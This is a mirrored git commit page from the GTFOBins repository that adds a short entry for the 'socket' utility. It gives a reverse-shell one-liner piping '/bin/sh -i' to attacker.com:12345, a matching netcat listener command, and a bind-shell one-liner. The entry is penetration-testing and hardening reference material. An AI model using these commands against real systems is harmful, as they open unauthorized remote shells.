mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-26 12:13:13 +02:00
14
_gtfobins/socket.md
Normal file
14
_gtfobins/socket.md
Normal file
@@ -0,0 +1,14 @@
|
||||
---
|
||||
function:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socket -qvp '/bin/sh -i' $RHOST $RPORT
|
||||
bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socket -svp '/bin/sh -i' $LPORT
|
||||
---
|
Reference in New Issue
Block a user